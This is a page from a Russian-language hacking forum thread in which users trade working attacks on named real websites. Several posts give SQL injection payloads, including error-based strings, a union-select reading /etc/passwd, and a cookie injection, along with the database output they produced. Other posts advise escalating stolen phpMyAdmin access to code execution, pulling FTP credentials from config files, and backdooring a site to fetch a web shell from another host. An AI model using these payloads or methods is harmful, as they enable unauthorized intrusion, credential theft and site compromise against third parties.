HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #671  
Старый 14.10.2015, 20:03
AlexG
Познающий
Регистрация: 26.09.2015
Сообщений: 56
С нами: 5595446

Репутация: 5
По умолчанию

Цитата:
Сообщение от dexspace  

http://www.veles.km.ua/
'"
выдаёт
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and ison='1' and visible='1' limit 0,1' at line 1
query=select id from deps where link=''"' and ison='1' and visible='1' limit 0,1;
сайт уязвим, но havij не может выдрать имя базы.
сейчас сканю sqlmap
есть идеи?
Руки рулят

Код:
http://www.veles.km.ua/' and (select 1 from (Select count(*),Concat((select version()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)  --+
 
Ответить с цитированием

  #672  
Старый 15.10.2015, 23:08
Kirza
Новичок
Регистрация: 12.03.2013
Сообщений: 0
С нами: 6931766

Репутация: 0
По умолчанию

Есть много phpmyadmin/ - разных версий. Уже с логинами и паролями. Движек Wordpres

Вопрос:

1 - Есть ли возможность - создать из phpmyadmin SMTP сервер

2 - Можно ли как сделать фтп или узнать данные фтп из phpmyadmin/

Спасибо.
 
Ответить с цитированием

  #673  
Старый 15.10.2015, 23:43
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Kirza  

Есть много phpmyadmin/ - разных версий. Уже с логинами и паролями. Движек Wordpres
Вопрос:
1 - Есть ли возможность - создать из phpmyadmin SMTP сервер
2 - Можно ли как сделать фтп или узнать данные фтп из phpmyadmin/
Спасибо.
1. Если file_priv, то можно постепенно поднимать права до RCE, а там уже делать, что хочется.

2. Только путем чтения конфигов (https://rdot.org/forum/showthread.php?t=741) или вариант выше
 
Ответить с цитированием

  #674  
Старый 15.10.2015, 23:52
-0x00-
Новичок
Регистрация: 19.08.2015
Сообщений: 25
С нами: 5650166

Репутация: 0
По умолчанию

Доброе время суток.

Я конечно повторяюсь, но потерял тему с этим вопросом.

Как пробэкдорить сайт, чтобы после обращения к скрипту - шелл загружался с левого сайта в определенную папку?
 
Ответить с цитированием

  #675  
Старый 16.10.2015, 00:44
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от -0x00-  

Доброе время суток.
Я конечно повторяюсь, но потерял тему с этим вопросом.
Как пробэкдорить сайт, чтобы после обращения к скрипту - шелл загружался с левого сайта в определенную папку?
http://php.net/manual/ru/function.file-put-contents.php
 
Ответить с цитированием

  #676  
Старый 16.10.2015, 00:51
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от -0x00-  

Доброе время суток.
Я конечно повторяюсь, но потерял тему с этим вопросом.
Как пробэкдорить сайт, чтобы после обращения к скрипту - шелл загружался с левого сайта в определенную папку?
Вы наверное про эту тему? /threads/307894/ - Не стандартные способы заливки шеллов
 
Ответить с цитированием

  #677  
Старый 16.10.2015, 02:48
Alaich
Новичок
Регистрация: 16.10.2015
Сообщений: 21
С нами: 5566646

Репутация: 7
По умолчанию

Есть доступ к mongodb вроде 2.4 , возможно как-то получить доступ к файлам сайта или залить шел ?

Подключаюсь через Robomongo
 
Ответить с цитированием

  #678  
Старый 16.10.2015, 13:27
aldemko
Познающий
Регистрация: 07.09.2015
Сообщений: 36
С нами: 5622806

Репутация: 0
По умолчанию

Доброго времени суток

Помогите пожалуйста - пытаюсь изучать различного рода уязвимости - не для баловства, и порчи имущества, а для общего развития

на примере уязвимости:

Код:
http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file(%27/etc/passwd%27),3,4--
каким образом можно раскрыть абсолютный путь сайта ?

к примеру все файлы из etc читаются.

а как перейти к файлу httpd.conf

или каким другим образом из подобного запроса можно раскрыть абсолютный путь к сайту ?

большое спасибо
 
Ответить с цитированием

  #679  
Старый 16.10.2015, 14:33
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию

Цитата:
Сообщение от aldemko  

Доброго времени суток
Помогите пожалуйста - пытаюсь изучать различного рода уязвимости - не для баловства, и порчи имущества, а для общего развития
на примере уязвимости:
Код:
http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file(%27/etc/passwd%27),3,4--
каким образом можно раскрыть абсолютный путь сайта ?
к примеру все файлы из etc читаются.
а как перейти к файлу httpd.conf
или каким другим образом из подобного запроса можно раскрыть абсолютный путь к сайту ?
большое спасибо
http://wiki.apache.org/httpd/DistrosDefaultLayout Изучи данный материал в помощь.

Так же там mysql root узнать пути с ссылкой выше не проблема, и залиться тоже.
 
Ответить с цитированием

  #680  
Старый 16.10.2015, 15:15
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию

Цитата:
Сообщение от RedFern.89  

Код:
http://prodota.ru/news/
Cookie: __cfduid=dd4763d374e8cfb5cbdfd45ca7737dd151443527442; session_id=1;
уязвим параметр session_id, дальше базы дело не идет? инъекция time based, поможет кто?
Что значит дальше базы дело не идёт? легко крутится через error based

Cookie: __cfduid=dd4763d374e8cfb5cbdfd45ca7737dd1514435274 42; session_id=1'or(select*from(select(name_const(vers ion(),1)),name_const(version(),1))a)and(1)='1

Код:
Ошибка базы данных. MySQL пишет:Duplicate column name '5.6.25-73.1-log'
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.